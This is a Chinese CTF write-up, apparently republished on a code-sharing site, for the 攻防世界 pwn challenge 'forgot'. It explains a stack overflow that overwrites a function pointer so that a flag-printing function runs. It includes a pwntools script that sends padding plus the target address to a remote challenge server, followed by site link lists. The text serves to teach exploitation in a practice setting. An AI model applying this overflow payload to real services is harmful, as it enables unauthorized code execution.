攻防世界forgot - 代码天地

攻防世界forgot

其他 2019-11-18 16:17:32 阅读次数: 0

代码最后调用了v3为基础，v14为偏移的地址的函数

然后发现v2可以溢出，并且可以覆盖掉v3

所以我们把v3覆盖为sub_80486CC的地址（此处输出flag）

之后要解决的就是不让v14改变

直接让第一个判断函数不通过即可

'\x47'就可以不通过

from pwn import *

# io=process('./forgot')
io=remote('111.198.29.45',41178)

io.sendline('fuck')
addr=0x80486CC
payload='\x47'*(0x20)+p32(addr)
io.sendline(payload)

io.interactive()
# i am a pig

猜你喜欢

转载自www.cnblogs.com/lxy8584099/p/11882804.html

攻防世界forgot

攻防世界PWN题 forgot

攻防世界(Pwn) forgot---栈溢出；(方法二)

6.pwn入门新手做攻防世界 forgot栈内变量溢出

逆向-攻防世界-maze

maze-----攻防世界

逆向-攻防世界-logmein

逆向-攻防世界-IgniteMe

逆向-攻防世界-gametime

xctf攻防世界——hacknote

逆向-攻防世界-The Maya

攻防世界 web 篇

攻防世界web

crackme---攻防世界

攻防世界--game

攻防世界--logmein

攻防世界-杂项-Misc

攻防世界--Shuffle

攻防世界--crackme

攻防世界 reverse BABYRE

攻防世界--maze

攻防世界--key

攻防世界 WEB NewsCenter

攻防世界 reverse babymips

攻防世界-ey-or

攻防世界 reverse evil

攻防世界 simple——js

攻防世界-evil

攻防世界--IgniteMe

攻防世界ctf bug

今日推荐

Apache Doris 2.0.10 版本正式发布！

开源日报 | 大模型开战；大模型独角兽被曝卖身；周鸿祎建议谷歌开源所有产品；最大开源AI社区提供1000万美元共享GPU

开源日报 | Chrome内置Gemini的意义不在于Gemini；中国AI追随之路的五大误区；ECharts创始人“下海”养鱼；谷歌I/O开发者大会什么都有，只是没有惊喜

微软回应中国区AI团队“打包赴美”传闻

基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个！

美国拟限制 AI 大模型出口中国和俄罗斯

苹果将与 OpenAI 达成协议，将 ChatGPT 应用于 iPhone

周排行

阿里云短信服务平台注册

Windows下的字符串处理(1)

sqoop: mysql导入数据到hdfs, hive, hbase

commons.lang中常用的工具类

离线安装PostgreSQL11.6

使用PyTorch简单实现卷积神经网络模型

一文彻底搞定谱聚类

一道面试题引发的血案

One Chat for Mac(聊天工具)

TCP/IP的底层队列是如何实现的？

每日归档

更多

2024-05-17(34)

2024-05-16(6)

2024-05-15(24)

2024-05-14(0)

2024-05-13(18)

2024-05-12(0)

2024-05-11(38)

2024-05-10(38)

2024-05-09(35)

2024-05-08(42)